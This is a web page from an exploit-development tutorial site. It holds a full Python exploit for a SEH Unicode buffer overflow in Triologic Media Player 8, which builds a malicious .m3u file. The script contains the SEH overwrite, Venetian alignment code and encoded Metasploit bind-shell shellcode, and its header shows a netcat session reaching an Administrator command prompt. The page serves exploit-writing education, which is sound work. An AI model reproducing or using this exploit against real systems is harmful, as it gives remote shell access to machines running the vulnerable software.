FuzzySec
  • Home
  • Tutorials
  • Scripting
  • Exploits
  • Links
  • Patreon
  • Contact

  • Home »
  • Exploits »
  • Triologic Media Player 8

Triologic Media Player 8 (.m3u) SEH Unicode

 

 

 

 

 

 

 

 

 

Created for part five of my exploit development tutorials covering unicode. 

#!/usr/bin/python -w

#-------------------------------------------------------------------------------#
# Exploit: Triologic Media Player 8 (.m3u) SEH Unicode                          #
# Author: b33f (Ruben Boonen) - http://www.fuzzysecurity.com/                   #
# OS: WinXP PRO SP3                                                             #
# Software: http://download.cnet.com/Triologic-Media-Player/                    #
#           3000-2139_4-10691520.html                                           #
#-------------------------------------------------------------------------------#
# This exploit was created for Part 5 of my Exploit Development tutorial        #
# series - http://www.fuzzysecurity.com/tutorials/expDev/5.html                 #
#-------------------------------------------------------------------------------#
# root@bt:/pentest/alpha2# nc -nv 192.168.111.128 9988                          #
# (UNKNOWN) [192.168.111.128] 9988 (?) open                                     #
# Microsoft Windows XP [Version 5.1.2600]                                       #
# (C) Copyright 1985-2001 Microsoft Corp.                                       #
#                                                                               #
# C:\Documents and Settings\Administrator\Desktop>                              #
#-------------------------------------------------------------------------------#

filename="evil.m3u"

#---------------------SEH-Structure---------------------#
#nSEH => \x41\x71 => 41       INC ECX                   #
#                    0071 00  ADD BYTE PTR DS:[ECX],DH  #
#SEH =>  \xF2\x41 => F2:      PREFIX REPNE:             #
#                    0041 00  ADD BYTE PTR DS:[ECX],AL  #
#-------------------------------------------------------#
#0x004100f2 : pop esi # pop ebx # ret 04 | triomp8.exe  #
#-------------------------------------------------------#
SEH = "\x41\x71" + "\xF2\x41"

#-----------------------Alignment-----------------------#
#After we step through nSEH and SEH if look at the dump #
#of the CPU registers we can see several which are close#
#to our shellcode, I chose EBP. Time for some Venetian  #
#Black-Magic alignment...                               #
#-------------------------------------------------------#
align = (
"\x55"                      #push EBP   
"\x71"                      #Venetian Padding
"\x58"                      #pop EAX
"\x71"                      #Venetian Padding
"\x05\x20\x11"              #add eax,0x11002000  \
"\x71"                      #Venetian Padding     |> +300
"\x2d\x17\x11"              #sub eax,0x11001700  /
"\x71"                      #Venetian Padding
"\x50"                      #push EAX
"\x71"                      #Venetian Padding
"\xC3")                     #RETN

#We need to pad our buffer to the place of our alignment in EAX
filler = "\x58"*117

#---------------------------------------Shellcode---------------------------------------------#
#root@bt:/pentest/alpha2# msfpayload windows/shell_bind_tcp LPORT=9988 R > bindshell9988.raw  #
#root@bt:/pentest/alpha2# ./alpha2 eax --unicode --uppercase < bindshell9988.raw              #
#---------------------------------------------------------------------------------------------#
shellcode = (
"PPYAIAIAIAIAQATAXAZAPA3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1"
"AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABA"
"BAB30APB944JBKLK8CYKPM0KPQP59ZEP18RQTTKQBNP4KQBLLTK0RLTDKC"
"BMXLOWGOZO6NQKONQ7PVLOLC13LKRNLO0GQHOLMKQY7YRL022R74KPRLP4"
"KPBOLKQJ0TKOPSHSU7PD4OZKQ8PPPTKQ8LX4KQHO0M1ICJCOLOYTK04TKM"
"1YFP1KONQ7P6L7QXOLMKQ7W08K0RUZTM33ML8OKCMO4SEYRQHTKPXO4KQI"
"CQV4KLLPK4KR8MLKQHSTKKT4KKQJ0SYOTO4NDQKQK1Q0Y1JPQKOIPB8QOQ"
"JTKMBJKTFQM38NSOBKPKPQXBWBSNRQOB4QXPLBWNFLGKO8UWHDPM1KPKPN"
"IWTPTPPBHO9SPRKKPKOJ50P20PP0P10PP10R0S89ZLOIOYPKO9EE9XGNQ9"
"K1CRHM2KPNGKTTIK61ZLP0V0WBH7RYKOGS7KOXU0SPWQX7GIYOHKOKOZ50"
"SB3R7C83DZLOKK1KO8UQGTIGWS8RURN0M1QKO8URHRC2MQTKPTIK31G0WP"
"WNQL6QZMBR9R6JBKM1VY7OTMTOLM1KQTMOTO4N096KPQ4B4PPQF0VPVOV2"
"6PNB6R6B3QF1X3IHLOO3VKOHUTIK00NR6PFKONP38LHU7MMQPKOXUGKJPG"
"EVBPV38G6F5GM5MKOXUOLLF3LKZCPKKIPBUM57KOWMCSBRO2JM0PSKO9EA")

boom = SEH + align + filler + shellcode
buffer = "\x90"*536 + boom + "B"*(4466-len(boom))
                                                                                                                         
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
© Copyright FuzzySecurity

Home | Tutorials | Scripting | Exploits | Links | Contact